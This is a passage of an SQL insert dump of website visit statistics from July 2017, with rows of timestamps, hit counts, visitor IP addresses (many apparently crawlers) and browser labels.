ther'),(129004,1499088930,1,1,0,0,'51.255.71.130','other'),(129005,1499089034,2,2,0,0,'91.196.178.161','chrome'),(129006,1499089240,1,0,1,0,'68.180.230.48',''),(129007,1499089323,1,1,0,0,'66.102.9.29','chrome'),(129008,1499089390,1,1,0,0,'91.196.178.129','chrome'),(129009,1499089589,1,1,0,0,'217.182.132.176','other'),(129010,1499090047,2,2,0,0,'91.196.178.69','firefox'),(129011,1499090205,1,1,0,0,'91.196.178.67','chrome'),(129012,1499090563,1,1,0,0,'51.255.65.8','other'),(129013,1499090615,1,1,0,0,'91.196.178.69','chrome'),(129014,1499090680,1,1,0,0,'91.196.178.161','chrome'),(129015,1499091069,1,1,0,0,'51.255.65.57','other'),(129016,1499091686,1,1,0,0,'137.74.201.99','other'),(129017,1499092004,1,1,0,0,'137.74.207.102','other'),(129018,1499092343,1,1,0,0,'51.255.65.224','other'),(129019,1499092471,1,1,0,0,'66.249.76.109','chrome'),(129020,1499092820,1,1,0,0,'157.55.39.142','other'),(129021,1499093253,1,1,0,0,'157.55.39.37','other'),(129022,1499093314,1,1,0,0,'54.165.59.7','other'),(129023,1499093385,1,1,0,0,'217.182.132.88','other'),(129024,1499093508,1,1,0,0,'217.182.132.95','other'),(129025,1499093713,2,2,0,0,'91.209.11.236','other'),(129026,1499094162,1,1,0,0,'217.182.132.20','other'),(129027,1499094201,1,1,0,0,'157.55.39.131','other'),(129028,1499094306,1,1,0,0,'217.182.132.7','other'),(129029,1499094386,1,1,0,0,'51.255.65.33','other'),(129030,1499094656,1,1,0,0,'216.244.66.246','other'),(129031,1499095417,1,1,0,0,'40.77.167.105','other'),(129032,1499095785,1,1,0,0,'91.196.178.67','chrome'),(129033,1499096059,3,3,0,0,'216.244.66.194','other'),(129034,1499096108,1,1,0,0,'217.182.132.85','other'),(129035,1499096304,1,1,0,0,'87.250.224.18','other'),(129036,1499096461,1,1,0,0,'51.255.65.77','other'),(129037,1499097366,1,1,0,0,'95.108.213.34','other'),(129038,1499097450,1,1,0,0,'95.108.179.15','other'),(129039,1499097472,1,1,0,0,'95.84.139.171','msie'),(129040,1499097474,1,1,0,0,'176.15.235.116','msie'),(129041,1499097989,1,1,0,0,'51.255.65.19','other'),(129042,1499098266,1,1,0,0,'8.29.198.26','other'),(129043,1499098873,1,1,0,0,'95.108.213.34','other'),(129044,1499098887,1,1,0,0,'37.54.69.135','chrome'),(129045,1499099551,1,1,0,0,'91.196.178.168','chrome'),(129046,1499099805,1,1,0,0,'91.196.178.68','firefox'),(129047,1499099855,1,1,0,0,'37.73.195.191','other'),(129048,1499100060,1,0,1,0,'68.180.230.48',''),(129049,1499100497,1,1,0,0,'95.108.179.15','other'),(129050,1499100648,1,1,0,0,'91.209.11.236','other'),(129051,1499101923,1,1,0,0,'91.196.178.34','chrome'),(129052,1499101988,1,1,0,0,'91.209.11.236','other'),(129053,1499102114,1,1,0,0,'217.182.132.193','other'),(129054,1499102335,2,0,2,0,'68.180.230.48',''),(129055,1499102805,4,4,0,0,'216.244.66.194','other'),(129056,1499103286,1,1,0,0,'51.255.71.117','other'),(129057,1499103288,1,1,0,0,'95.108.213.34','other'),(129058,1499103516,1,1,0,0,'137.74.203.194','other'),(129059,1499103751,1,1,0,0,'92.113.126.78','chrome'),(129060,1499103929,2,2,0,0,'141.8.142.164','other'),(129061,1499104040,1,0,1,0,'66.249.66.157',''),(129062,1499104326,1,1,0,0,'216.244.66.246','other'),(129063,1499104543,1,1,0,0,'217.182.132.37','other'),(129064,1499104620,1,1,0,0,'151.80.27.116','other'),(129065,1499104662,1,1,0,0,'217.182.132.54','other'),(129066,1499104860,1,1,0,0,'95.108.179.15','other'),(129067,1499104951,1,1,0,0,'95.84.139.171','msie'),(129068,1499104952,1,1,0,0,'176.15.235.116','msie'),(129069,1499105110,1,1,0,0,'66.249.76.91','chrome'),(129070,1499105128,1,1,0,0,'66.249.66.156','chrome'),(129071,1499105145,1,1,0,0,'66.249.66.155','chrome'),(129072,1499105332,1,1,0,0,'101.236.19.91','chrome'),(129073,1499105578,1,1,0,0,'91.209.11.236','other'),(129074,1499105655,1,1,0,0,'95.108.213.34','other'),(129075,1499106205,2,2,0,0,'95.108.179.15','other'),(129076,1499106787,2,2,0,0,'95.108.213.34','other'),(129077,1499107068,2,2,0,0,'216.244.66.194','other'),(129078,1499107210,1,1,0,0,'66.249.76.109','chrome'),(129079,1499107214,1,1,0,0,'51.255.65.44','other'),(129080,1499107244,1,1,0,0,'141.8.142.154','other'),(129081,1499107360,1,1,0,0,'185.7.215.163','firefox'),(129082,1499107613,1,1,0,0,'66.249.66.74','chrome'),(129083,1499107792,2,2,0,0,'95.108.213.34','other'),(129084,1499108473,1,1,0,0,'216.244.66.246','other'),(129085,1499108503,1,1,0,0,'217.182.132.65','other'),(129086,1499108571,1,1,0,0,'51.255.71.119','other'),(129087,1499108645,1,0,1,0,'66.249.76.93',''),(129088,1499108672,1,1,0,0,'217.182.132.83','other'),(129089,1499108726,1,1,0,0,'51.255.65.42','other'),(129090,1499108908,1,1,0,0,'91.196.178.69','chrome'),(129091,1499109087,1,1,0,0,'8.29.198.25','other'),(129092,1499109527,1,1,0,0,'157.55.39.131','other'),(129093,1499109605,1,1,0,0,'51.255.65.91','other'),(129094,1499109848,1,1,0,0,'95.108.213.34','other'),(129095,1499109985,1,1,0,0,'51.255.65.96','other'),(129096,1499110043,2,0,2,0,'66.249.76.107',''),(129097,1499110389,1,1,0,0,'141.8.142.154','other'),(129098,1499110412,1,1,0,0,'217.182.132.78','other'),(129099,1499110610,1,1,0,0,'51.255.65.37','other'),(129100,1499110984,1,0,1,0,'66.249.76.109',''),(129101,1499111444,1,1,0,0,'217.182.132.86','other'),(129102,1499111523,1,1,0,0,'66.249.66.75','chrome'),(129103,1499112248,1,1,0,0,'217.182.132.66','other'),(129104,1499112563,1,1,0,0,'51.255.65.86','other'),(129105,1499112610,1,1,0,0,'66.249.76.107','chrome'),(129106,1499112623,1,1,0,0,'216.244.66.194','other'),(129107,1499112756,1,1,0,0,'217.182.132.85','other'),(129108,1499113264,1,1,0,0,'91.209.11.236','other'),(129109,1499113976,1,1,0,0,'217.182.132.177','other'),(129110,1499114203,1,1,0,0,'178.154.149.3','other'),(129111,1499114334,1,1,0,0,'5.255.253.83','other'),(129112,1499114338,1,1,0,0,'141.8.183.1','other'),(129113,1499114608,1,1,0,0,'5.255.253.58','other'),(129114,1499115470,1,1,0,0,'66.249.76.107','chrome'),(129115,1499115514,1,1,0,0,'51.255.65.89','other'),(129116,1499115846,1,1,0,0,'217.182.132.85','other'),(129117,1499115891,1,1,0,0,'51.255.65.35','other'),(129118,1499115994,1,1,0,0,'51.255.65.50','other'),(129119,1499116476,1,1,0,0,'217.182.132.84','other'),(129120,1499116481,1,1,0,0,'95.84.139.171','msie'),(129121,1499116482,1,1,0,0,'176.15.235.116','msie'),(129122,1499117098,1,1,0,0,'217.69.133.6','other'),(129123,1499117195,1,1,0,0,'217.182.132.81','other'),(129124,1499117558,1,1,0,0,'51.255.65.10','other'),(129125,1499117896,1,1,0,0,'51.255.65.58','other'),(129126,1499118005,1,1,0,0,'217.182.132.177','other'),(129127,1499118313,1,1,0,0,'51.255.65.9','other'),(129128,1499118578,1,1,0,0,'91.209.11.236','other'),(129129,1499118632,2,0,2,0,'66.249.76.108',''),(129130,1499118690,3,3,0,0,'216.244.66.246','other'),(129131,1499118848,1,1,0,0,'95.108.179.15','other'),(129132,1499119913,1,1,0,0,'8.29.198.27','other'),(129133,1499121650,1,1,0,0,'95.108.213.34','other'),(129134,1499122780,1,1,0,0,'66.249.76.107','chrome'),(129135,1499122974,1,1,0,0,'95.108.213.34','other'),(129136,1499123416,1,1,0,0,'188.32.239.123','msie'),(129137,1499123417,1,1,0,0,'176.15.235.116','msie'),(129138,1499124242,1,0,1,0,'66.249.76.107',''),(129139,1499124529,1,1,0,0,'199.58.86.209','other'),(129140,1499124588,2,2,0,0,'216.244.66.194','other'),(129141,1499124957,1,1,0,0,'46.188.106.212','msie'),(129142,1499125059,2,2,0,0,'216.244.66.246','other'),(129143,1499125877,2,2,0,0,'95.108.213.34','other'),(129144,1499126156,2,2,0,0,'216.244.66.194','other'),(129145,1499126731,1,1,0,0,'180.76.15.152','other'),(129146,1499127139,3,3,0,0,'95.108.213.34','other'),(129147,1499127169,1,0,1,0,'68.180.230.48',''),(129148,1499127276,1,1,0,0,'141.8.142.164','other'),(129149,1499127725,2,2,0,0,'216.244.66.246','other'),(129150,1499128122,1,1,0,0,'95.108.213.34','other'),(129151,1499128402,1,0,1,0,'66.249.66.155',''),(129152,1499128505,1,1,0,0,'37.9.113.43','other'),(129153,1499128750,1,1,0,0,'54.165.59.7','other'),(129154,1499128758,1,0,1,0,'68.180.230.48',''),(129155,1499129152,1,1,0,0,'188.32.176.228','msie'),(129156,1499129418,1,1,0,0,'5.255.253.63','other'),(129157,1499129421,1,1,0,0,'95.108.213.7','other'),(129158,1499129788,1,1,0,0,'216.244.66.194','other'),(129159,1499129847,2,2,0,0,'95.108.213.34','other'),(129160,1499130060,1,1,0,0,'37.204.66.49','msie'),(129161,1499130744,1,1,0,0,'8.29.198.27','other'),(129162,1499130753,1,1,0,0,'216.244.66.237','other'),(129163,1499130952,2,2,0,0,'95.108.179.15','other'),(129164,1499131454,1,1,0,0,'95.84.139.171','msie'),(129165,1499131455,1,1,0,0,'176.15.235.116','msie'),(129166,1499132004,1,1,0,0,'66.249.66.76','chrome'),(129167,1499132384,1,1,0,0,'178.154.200.45','other'),(129168,1499133498,1,1,0,0,'207.46.13.61','other'),(129169,1499134049,1,1,0,0,'93.158.152.79','other'),(129170,1499134055,1,1,0,0,'66.249.66.156','chrome'),(129171,1499134478,2,0,2,0,'68.180.230.48',''),(129172,1499134868,1,1,0,0,'66.249.76.93','chrome'),(129173,1499134877,1,0,1,0,'66.249.76.89',''),(129174,1499135008,1,1,0,0,'141.8.142.42','other'),(129175,1499135388,1,1,0,0,'37.9.113.43','other'),(129176,1499135947,3,3,0,0,'216.244.66.246','other'),(129177,1499136678,1,1,0,0,'40.77.167.105','other'),(129178,1499136741,1,1,0,0,'95.108.179.15','other'),(129179,1499136859,1,1,0,0,'46.188.106.212','msie'),(129180,1499136975,1,0,1,0,'68.180.230.48',''),(129181,1499137033,1,1,0,0,'95.84.139.171','msie'),(129182,1499137034,1,1,0,0,'176.15.235.116','msie'),(129183,1499137388,1,1,0,0,'157.55.39.142','other'),(129184,1499137629,1,1,0,0,'95.108.213.34','other'),(129185,1499137768,1,1,0,0,'217.69.133.67','other'),(129186,1499138565,1,1,0,0,'93.158.152.79','other'),(129187,1499139089,1,1,0,0,'95.108.213.7','other'),(129188,1499139261,1,1,0,0,'178.154.200.60','other'),(129189,1499139800,1,1,0,0,'141.8.142.42','other'),(129190,1499139804,1,1,0,0,'141.8.132.43','other'),(129191,1499140225,1,1,0,0,'91.209.11.236','other'),(129192,1499140269,1,1,0,0,'87.250.224.16','other'),(129193,1499140433,1,1,0,0,'141.8.142.49','other'),(129194,1499141561,2,2,0,0,'216.244.66.246','other'),(129195,1499141566,1,1,0,0,'8.29.198.27','other'),(129196,1499143012,1,1,0,0,'66.249.76.109','chrome'),(129197,1499143065,3,3,0,0,'216.244.66.246','other'),(129199,1499143139,1,1,0,0,'91.196.178.72','firefox'),(129200,1499144345,1,1,0,0,'91.209.11.236','other'),(129201,1499144601,1,1,0,0,'91.196.178.72','firefox'),(129202,1499144675,1,1,0,0,'91.196.178.68','chrome'),(129203,1499145473,1,1,0,0,'141.8.142.154','other'),(129204,1499145592,2,2,0,0,'216.244.66.194','other'),(129205,1499146190,1,1,0,0,'95.108.213.34','other'),(129206,1499146218,2,2,0,0,'91.196.178.68','chrome'),(129207,1499146678,1,1,0,0,'91.196.178.72','chrome'),(129208,1499146818,1,1,0,0,'92.113.85.73','chrome'),(129209,1499147042,2,2,0,0,'95.108.179.15','other'),(129210,1499147067,1,0,1,0,'66.249.76.108',''),(129211,1499147152,1,1,0,0,'101.236.19.91','chrome'),(129212,1499147168,2,2,0,0,'91.196.178.68','chrome'),(129213,1499147353,1,1,0,0,'91.196.178.67','chrome'),(129214,1499147976,1,1,0,0,'91.209.11.236','other'),(129215,1499148109,1,1,0,0,'216.244.66.194','other'),(129216,1499148211,1,1,0,0,'141.8.142.154','other'),(129217,1499148214,1,1,0,0,'180.76.15.142','other'),(129218,1499148934,2,2,0,0,'95.108.213.34','other'),(129219,1499149070,1,1,0,0,'46.188.106.212','msie'),(129220,1499149244,1,1,0,0,'178.136.13.245','chrome'),(129221,1499149281,1,1,0,0,'91.196.178.68','chrome'),(129222,1499149574,1,1,0,0,'95.108.179.15','other'),(129223,1499149881,1,0,1,0,'68.180.230.48',''),(129224,1499149887,2,2,0,0,'91.196.178.71','firefox'),(129225,1499150024,1,1,0,0,'95.108.213.34','other'),(129226,1499150182,1,1,0,0,'216.244.66.246','other'),(129227,1499150430,1,1,0,0,'91.196.178.68','chrome'),(129228,1499150539,1,1,0,0,'157.55.39.142','other'),(129229,1499151098,1,1,0,0,'95.108.179.15','other'),(129230,1499151452,1,1,0,0,'91.196.178.68','chrome'),(129231,1499152276,1,1,0,0,'37.147.97.179','msie'),(129232,1499152277,1,1,0,0,'176.15.235.116','msie'),(129233,1499152394,1,1,0,0,'8.29.198.27','other'),(129234,1499152446,1,1,0,0,'66.102.9.27','chrome'),(129235,1499152841,2,2,0,0,'216.244.66.246','other'),(129236,1499153610,6,6,0,0,'198.245.49.215','other'),(129237,1499153649,1,1,0,0,'217.69.133.67','other'),(129238,1499154034,1,1,0,0,'95.108.179.15','other'),(129239,1499154817,1,1,0,0,'91.209.11.236','other'),(129240,1499155078,1,1,0,0,'91.196.178.68','chrome'),(129241,1499155513,1,1,0,0,'95.108.213.34','other'),(129242,1499155518,1,1,0,0,'5.255.253.63','other'),(129243,1499155775,1,1,0,0,'91.196.178.68','firefox'),(129244,1499156010,2,2,0,0,'216.244.66.194','other'),(129245,1499157063,1,1,0,0,'95.108.179.15','other'),(129246,1499157068,1,1,0,0,'91.196.178.68','chrome'),(129247,1499157227,1,1,0,0,'91.209.11.236','other'),(129248,1499157288,1,1,0,0,'95.84.139.171','msie'),(129249,1499157289,1,1,0,0,'176.14.244.114','msie'),(129250,1499157402,1,1,0,0,'95.108.213.34','other'),(129251,1499157761,1,1,0,0,'31.43.19.98','chrome'),(129252,1499157806,1,1,0,0,'66.249.66.155','chrome'),(129253,1499157851,1,1,0,0,'66.249.66.75','chrome'),(129254,1499157911,1,1,0,0,'66.249.66.157','chrome'),(129255,1499158264,1,1,0,0,'91.196.178.71','firefox'),(129256,1499158510,1,1,0,0,'66.249.76.91','chrome'),(129257,1499158774,1,1,0,0,'91.209.11.236','other'),(129258,1499158927,2,0,2,0,'68.180.230.48',''),(129259,1499159005,1,1,0,0,'178.140.235.174','msie'),(129260,1499159019,1,1,0,0,'66.249.76.93','chrome'),(129261,1499159868,1,1,0,0,'95.108.213.34','other'),(129262,1499160107,1,1,0,0,'66.102.9.27','chrome'),(129263,1499160303,1,1,0,0,'109.251.106.21','chrome'),(129264,1499161866,1,1,0,0,'66.249.76.107','chrome'),(129265,1499161900,1,0,1,0,'68.180.230.48',''),(129266,1499161965,1,1,0,0,'37.54.69.135','chrome'),(129267,1499162062,1,1,0,0,'37.54.19.29','chrome'),(129268,1499162355,1,1,0,0,'109.63.241.195','chrome'),(129269,1499162490,1,1,0,0,'91.196.178.72','firefox'),(129270,1499162531,1,1,0,0,'91.209.11.236','other'),(129271,1499163216,1,1,0,0,'8.29.198.26','other'),(129272,1499163356,2,2,0,0,'216.244.66.194','other'),(129273,1499163587,1,1,0,0,'87.250.224.18','other'),(129274,1499163709,3,3,0,0,'216.244.66.246','other'),(129275,1499164101,1,1,0,0,'95.108.179.15','other'),(129276,1499164372,1,1,0,0,'91.209.11.236','other'),(129277,1499165185,2,0,2,0,'68.180.230.48',''),(129278,1499165373,1,1,0,0,'217.182.132.179','other'),(129279,1499165601,1,1,0,0,'92.113.159.52','chrome'),(129280,1499165634,1,1,0,0,'141.8.142.164','other'),(129281,1499165694,2,2,0,0,'95.108.179.15','other'),(129282,1499166051,1,1,0,0,'51.255.65.64','other'),(129283,1499166349,1,0,1,0,'66.249.76.108',''),(129284,1499166417,1,1,0,0,'51.255.65.84','other'),(129285,1499166740,1,1,0,0,'51.255.65.25','other'),(129286,1499166825,1,1,0,0,'91.196.178.68','chrome'),(129287,1499166827,1,1,0,0,'173.252.88.86','other'),(129288,1499167226,1,1,0,0,'51.255.65.4','other'),(129289,1499167526,5,5,0,0,'216.244.66.194','other'),(129290,1499168057,1,1,0,0,'95.221.255.203','msie'),(129291,1499168250,1,1,0,0,'46.211.128.229','chrome'),(129292,1499168769,1,1,0,0,'185.137.17.59','chrome'),(129293,1499169156,1,1,0,0,'51.255.65.75','other'),(129294,1499169286,1,1,0,0,'217.182.132.155','other'),(129295,1499169455,1,1,0,0,'51.255.65.45','other'),(129296,1499169811,1,1,0,0,'51.255.65.33','other'),(129297,1499170036,1,1,0,0,'51.255.71.117','other'),(129298,1499170466,1,1,0,0,'217.182.132.60','other'),(129299,1499170487,1,1,0,0,'217.182.132.25','other'),(129300,1499170501,3,3,0,0,'216.244.66.246','other'),(129301,1499170797,1,1,0,0,'51.255.65.90','other'),(129302,1499171029,1,1,0,0,'217.182.132.192','other'),(129303,1499171387,1,0,1,0,'68.180.231.23',''),(129304,1499171596,1,1,0,0,'95.132.52.80','firefox'),(129305,1499171987,1,1,0,0,'217.182.132.93','other'),(129306,1499172145,1,1,0,0,'217.182.132.94','other'),(129307,1499172328,1,1,0,0,'66.249.76.91','chrome'),(129308,1499172338,1,1,0,0,'217.182.132.175','other'),(129309,1499172649,1,1,0,0,'51.255.65.6','other'),(129310,1499172840,1,1,0,0,'91.196.178.98','chrome'),(129311,1499173040,1,0,1,0,'68.180.230.48',''),(129312,1499173065,1,1,0,0,'217.182.132.185','other'),(129313,1499174047,1,1,0,0,'8.29.198.25','other'),(129314,1499174316,1,1,0,0,'91.196.178.69','firefox'),(129315,1499174364,1,1,0,0,'217.182.132.176','other'),(129316,1499175068,1,1,0,0,'151.80.27.116','other'),(129317,1499175223,1,1,0,0,'91.196.177.46','chrome'),(129318,1499175693,2,2,0,0,'198.204.253.58','msie'),(129319,1499175794,1,1,0,0,'217.182.132.23','other'),(129320,1499176185,1,1,0,0,'51.255.71.121','other'),(129321,1499176384,1,1,0,0,'51.255.65.224','other'),(129322,1499176446,1,1,0,0,'51.255.65.10','other'),(129323,1499176612,1,1,0,0,'91.196.178.72','firefox'),(129324,1499176809,1,1,0,0,'91.217.197.196','chrome'),(129325,1499177138,1,1,0,0,'46.174.162.231','firefox'),(129326,1499177308,1,1,0,0,'51.255.65.22','other'),(129327,1499177324,1,0,1,0,'68.180.230.48',''),(129328,1499177674,1,1,0,0,'137.74.203.194','other'),(129329,1499177773,1,1,0,0,'91.196.178.65','chrome'),(129330,1499178520,4,4,0,0,'216.244.66.246','other'),(129331,1499178620,1,1,0,0,'51.255.71.127','other'),(129332,1499178800,1,1,0,0,'51.255.65.35','other'),(129333,1499178962,1,0,1,0,'66.249.76.91',''),(129334,1499179055,1,1,0,0,'141.8.142.154','other'),(129335,1499179175,1,1,0,0,'46.201.12.121','chrome'),(129336,1499179354,1,1,0,0,'217.182.132.93','other'),(129337,1499180234,1,0,1,0,'68.180.230.48',''),(129338,1499180826,1,1,0,0,'51.255.65.19','other'),(129339,1499180839,1,1,0,0,'51.255.65.75','other'),(129340,1499181195,1,1,0,0,'51.255.65.23','other'),(129341,1499181477,1,1,0,0,'216.244.66.246','other'),(129342,1499182208,1,1,0,0,'137.74.207.164','other'),(129343,1499182850,1,1,0,0,'95.84.139.171','msie'),(129344,1499182851,1,1,0,0,'176.14.244.114','msie'),(129345,1499183885,1,1,0,0,'207.46.13.149','other'),(129346,1499184581,1,0,1,0,'68.180.230.48',''),(129347,1499184877,1,1,0,0,'8.29.198.25','other'),(129348,1499185704,1,1,0,0,'51.255.65.93','other'),(129349,1499185740,3,3,0,0,'216.244.66.194','other'),(129350,1499185852,1,1,0,0,'217.182.132.16','other'),(129351,1499186013,2,2,0,0,'91.209.11.236','other'),(129352,1499186073,1,1,0,0,'93.74.212.147','firefox'),(129353,1499186539,1,1,0,0,'95.84.129.5','msie'),(129354,1499186565,1,1,0,0,'176.193.120.220','msie'),(129355,1499187451,1,0,1,0,'66.249.64.153',''),(129356,1499187498,3,0,3,0,'66.249.64.28',''),(129357,1499187540,2,0,2,0,'66.249.64.155',''),(129358,1499187782,5,5,0,0,'216.244.66.246','other'),(129359,1499188129,1,1,0,0,'95.108.213.34','other'),(129360,1499188541,1,1,0,0,'217.182.132.5','other'),(129361,1499188930,1,0,1,0,'66.249.64.29',''),(129362,1499189004,2,0,2,0,'68.180.230.48',''),(129363,1499189568,1,1,0,0,'217.182.132.180','other'),(129364,1499190017,1,1,0,0,'51.255.65.20','other'),(129365,1499190160,1,1,0,0,'51.255.71.131','other'),(129366,1499190519,1,1,0,0,'217.182.132.148','other'),(129367,1499190673,1,1,0,0,'217.182.132.188','other'),(129368,1499190898,1,1,0,0,'217.182.132.34','other'),(129369,1499191476,1,0,1,0,'66.249.64.157',''),(129370,1499191594,1,1,0,0,'95.108.179.15','other'),(129371,1499191611,4,4,0,0,'95.108.213.34','other'),(129372,1499191672,3,3,0,0,'216.244.66.246','other'),(129373,1499191691,1,1,0,0,'51.255.65.34','other'),(129374,1499192214,1,1,0,0,'51.255.65.75','other'),(129375,1499192826,1,1,0,0,'51.255.65.23','other'),(129376,1499193605,1,1,0,0,'217.182.132.79','other'),(129377,1499194541,2,2,0,0,'216.244.66.194','other'),(129378,1499194953,5,5,0,0,'216.244.66.246','other'),(129379,1499194955,1,1,0,0,'92.113.189.50','chrome'),(129380,1499195040,1,1,0,0,'217.182.132.172','other'),(129381,1499195246,1,1,0,0,'91.196.178.166','chrome'),(129382,1499195490,1,1,0,0,'164.132.162.159','other'),(129383,1499195707,1,1,0,0,'8.29.198.26','other'),(129384,1499196117,1,1,0,0,'51.255.71.126','other'),(129385,1499196121,1,1,0,0,'217.182.132.72','other'),(129386,1499196288,1,1,0,0,'51.255.65.24','other'),(129387,1499196440,1,0,1,0,'66.249.64.155',''),(129388,1499196563,1,1,0,0,'66.249.64.28','chrome'),(129389,1499196657,1,1,0,0,'217.182.132.150','other'),(129390,1499196936,1,1,0,0,'51.255.65.69','other'),(129391,1499196973,1,0,1,0,'66.249.64.29',''),(129392,1499196994,1,1,0,0,'95.108.179.15','other'),(129393,1499197278,1,1,0,0,'217.182.132.32','other'),(129394,1499197347,1,1,0,0,'217.182.132.92','other'),(129395,1499197981,1,1,0,0,'217.182.132.14','other'),(129396,1499198302,1,1,0,0,'207.46.13.149','other'),(129397,1499198981,1,0,1,0,'68.180.230.48',''),(129398,1499199320,1,1,0,0,'95.108.179.15','other'),(129399,1499199324,1,1,0,0,'141.8.142.154','other'),(129400,1499199476,1,1,0,0,'180.76.15.31','other'),(129401,1499199523,1,1,0,0,'51.255.71.125','other'),(129402,1499199837,1,1,0,0,'137.74.207.188','other'),(129403,1499199838,1,1,0,0,'51.255.71.132','other'),(129404,1499200392,1,1,0,0,'66.249.64.30','chrome'),(129405,1499200786,2,0,2,0,'68.180.230.48',''),(129406,1499200795,1,1,0,0,'217.182.132.187','other'),(129407,1499200862,1,1,0,0,'217.182.132.171','other'),(129408,1499200960,2,2,0,0,'216.244.66.246','other'),(129409,1499201222,1,1,0,0,'216.244.66.194','other'),(129410,1499201500,1,0,1,0,'66.249.64.28',''),(129411,1499201644,1,1,0,0,'178.154.149.3','other'),(129412,1499202180,1,1,0,0,'51.255.71.133','other'),(129413,1499202889,1,1,0,0,'180.76.15.138','other'),(129414,1499202983,1,1,0,0,'157.55.39.240','other'),(129415,1499203283,5,5,0,0,'5.9.88.103','other'),(129416,1499203418,1,1,0,0,'51.255.71.127','other'),(129417,1499203501,1,1,0,0,'66.249.64.153','chrome'),(129418,1499204383,1,1,0,0,'91.209.11.236','other'),(129419,1499204741,1,1,0,0,'66.249.64.28','chrome'),(129420,1499204749,1,1,0,0,'51.255.65.27','other'),(129421,1499204933,1,1,0,0,'51.255.65.42','other'),(129422,1499204957,1,1,0,0,'217.182.132.35','other'),(129423,1499204996,1,1,0,0,'217.182.132.171','other'),(129424,1499205206,1,1,0,0,'217.182.132.191','other'),(129425,1499205699,1,1,0,0,'217.182.132.187','other'),(129426,1499205721,1,1,0,0,'216.244.66.237','other'),(129427,1499205973,2,2,0,0,'216.244.66.246','other'),(129428,1499206103,1,1,0,0,'51.255.65.22','other'),(129429,1499206531,1,1,0,0,'8.29.198.26','other'),(129430,1499206980,2,2,0,0,'216.244.66.194','other'),(129431,1499207024,1,1,0,0,'51.255.65.33','other'),(129432,1499207209,1,1,0,0,'178.154.149.1','other'),(129433,1499208089,2,2,0,0,'216.244.66.246','other'),(129434,1499208097,1,1,0,0,'51.255.65.19','other'),(129435,1499208130,1,1,0,0,'51.255.71.98','other'),(129436,1499208513,2,0,2,0,'66.249.64.28',''),(129437,1499209126,1,1,0,0,'137.74.207.110','other'),(129438,1499209132,1,1,0,0,'66.249.64.29','chrome'),(129439,1499209658,1,1,0,0,'217.69.133.3','other'),(129440,1499209691,1,0,1,0,'68.180.230.48',''),(129441,1499210018,1,1,0,0,'51.255.65.14','other'),(129442,1499210302,1,1,0,0,'217.182.132.50','other'),(129443,1499210541,1,0,1,0,'66.249.64.30',''),(129444,1499210589,2,0,2,0,'66.249.64.29',''),(129445,1499210610,1,1,0,0,'66.249.64.155','chrome'),(129446,1499210617,2,2,0,0,'66.249.64.28','chrome'),(129447,1499210665,1,1,0,0,'66.249.64.29','chrome'),(129448,1499210793,1,1,0,0,'217.182.132.170','other'),(129449,1499210920,1,1,0,0,'217.182.132.182','other'),(129450,1499211493,1,1,0,0,'95.108.213.34','other'),(129451,1499211893,1,0,1,0,'66.249.64.153',''),(129452,1499212555,1,1,0,0,'66.249.64.153','chrome'),(129453,1499212693,1,1,0,0,'66.249.64.157','chrome'),(129454,1499212695,1,1,0,0,'66.249.64.29','chrome'),(129455,1499212980,1,1,0,0,'51.255.71.112','other'),(129456,1499213495,1,1,0,0,'51.255.65.92','other'),(129457,1499213727,1,1,0,0,'164.132.162.188','other'),(129458,1499213901,1,1,0,0,'91.209.11.236','other'),(129459,1499213962,1,1,0,0,'66.249.64.157','chrome'),(129460,1499214222,1,1,0,0,'217.182.132.148','other'),(129461,1499214280,1,1,0,0,'95.108.179.15','other'),(129462,1499214391,1,0,1,0,'66.249.64.30',''),(129463,1499214397,1,0,1,0,'66.249.64.155',''),(129464,1499214487,1,1,0,0,'51.255.71.122','other'),(129465,1499214690,1,1,0,0,'217.182.132.5','other'),(129466,1499214743,1,0,1,0,'68.180.230.48',''),(129467,1499215427,1,1,0,0,'95.108.179.15','other'),(129468,1499216166,1,0,1,0,'66.249.64.153',''),(129469,1499216205,1,1,0,0,'137.74.207.170','other'),(129470,1499216873,1,1,0,0,'217.182.132.184','other'),(129471,1499216906,1,1,0,0,'51.255.65.94','other'),(129472,1499217206,1,1,0,0,'216.244.66.194','other'),(129473,1499217358,1,1,0,0,'8.29.198.27','other'),(129474,1499217473,1,1,0,0,'46.188.106.212','msie'),(129475,1499217638,3,3,0,0,'216.244.66.246','other'),(129476,1499217797,1,0,1,0,'68.180.230.48',''),(129477,1499217831,1,1,0,0,'66.249.64.28','chrome'),(129478,1499218513,1,1,0,0,'51.255.65.90','other'),(129479,1499218888,2,2,0,0,'95.108.213.34','other'),(129480,1499219046,2,2,0,0,'216.244.66.246','other'),(129481,1499220065,1,1,0,0,'217.182.132.95','other'),(129482,1499220737,1,1,0,0,'217.182.132.88','other'),(129483,1499221236,1,1,0,0,'217.182.132.173','other'),(129484,1499221675,1,1,0,0,'164.132.162.160','other'),(129485,1499221993,1,1,0,0,'217.182.132.75','other'),(129486,1499222240,1,1,0,0,'217.182.132.86','other'),(129487,1499222501,1,1,0,0,'216.244.66.237','other'),(129488,1499222841,1,1,0,0,'51.255.65.83','other'),(129489,1499224705,1,1,0,0,'51.255.71.100','other'),(129490,1499224892,1,1,0,0,'217.182.132.179','other'),(129491,1499225072,1,1,0,0,'217.182.132.69','other'),(129492,1499226597,1,1,0,0,'216.244.66.246','other'),(129493,1499226667,1,1,0,0,'51.255.65.46','other'),(129494,1499227197,1,1,0,0,'95.108.213.34','other'),(129495,1499227199,1,1,0,0,'216.244.66.237','other'),(129496,1499227427,1,1,0,0,'217.182.132.28','other'),(129497,1499228177,1,1,0,0,'164.132.162.164','other'),(129498,1499228189,1,1,0,0,'8.29.198.27','other'),(129499,1499228329,1,1,0,0,'66.249.64.28','chrome'),(129500,1499228360,1,1,0,0,'217.182.132.82','other'),(129501,1499228588,1,1,0,0,'46.188.106.212','msie'),(129502,1499228791,2,2,0,0,'216.244.66.194','other'),(129503,1499228852,1,1,0,0,'95.108.179.15','other'),(129504,1499228921,1,1,0,0,'157.55.39.142','other'),(129505,1499229017,3,3,0,0,'216.244.66.246','other'),(129506,1499229903,1,1,0,0,'91.196.178.65','firefox'),(129507,1499230030,1,0,1,0,'66.249.64.28',''),(129508,1499230466,1,1,0,0,'95.108.179.15','other'),(129509,1499230915,1,1,0,0,'164.132.164.180','other'),(129510,1499230934,1,1,0,0,'91.196.178.65','firefox'),(129511,1499231428,1,1,0,0,'217.69.133.9','other'),(129512,1499232087,1,1,0,0,'51.255.65.84','other'),(129513,1499232542,1,1,0,0,'91.196.178.65','firefox'),(129514,1499232716,1,1,0,0,'51.255.65.75','other'),(129515,1499232772,1,1,0,0,'91.196.178.65','chrome'),(12